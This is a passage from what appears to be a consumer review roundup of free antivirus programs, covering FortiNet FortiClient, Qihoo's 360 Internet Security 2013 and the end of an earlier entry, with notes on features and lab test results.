Its straightforward system scanner uses a dual scan engine, rated highly by Virus Bulletin (and which actually achieved a 100% detection rate in a recent AV-Comparatives test).
And experienced users will appreciate tools like HiJackFree and BlitzBlank, which can help you manually detect and clean up malware.

8. FortiNet FortiClient
While they're best known in the corporate world of network security appliances, FortiNet also produce a capable antivirus tool, FortiClient, which is free for home users.
The program can be installed in two modes. The standard option provides a good range of tools: an antivirus engine, simple parental controls, an application firewall, vulnerability scanning and more. But you can also run FortiClient without its real-time protection, perfect if you need to run it alongside an existing antivirus tool without conflicts.
Our tests suggest it's not the best antivirus engine around, but is still worth having. AV-Test and AV-Comparatives confirm that it's a good mid-range contender, and FortiClient could be particularly helpful if you want a second-line tool to run alongside an existing antivirus engine.

9. 360 Internet Security 2013
Qihoo is a Chinese software company which has had enormous success in its home market (it claims 450 million users), but now it's branching out with its first international release, 360 Internet Security 2013.
Despite its name, this isn't a full internet security suite - there's no spam filter, firewall or parental controls - but installing the program does get you no less than three antivirus engines: BitDefender, its own QVM II, and Cloud 360.
These delivered accurate results for us, and the independent testing labs have also reported positive results for Qihoo products in the past year (AV Comparatives has certified it as "Windows 8 approved", for instance).
360 Internet Security does a reasonable job of blocking access to malicious websites, too, and on balance it's an effective entry to the free antivirus world.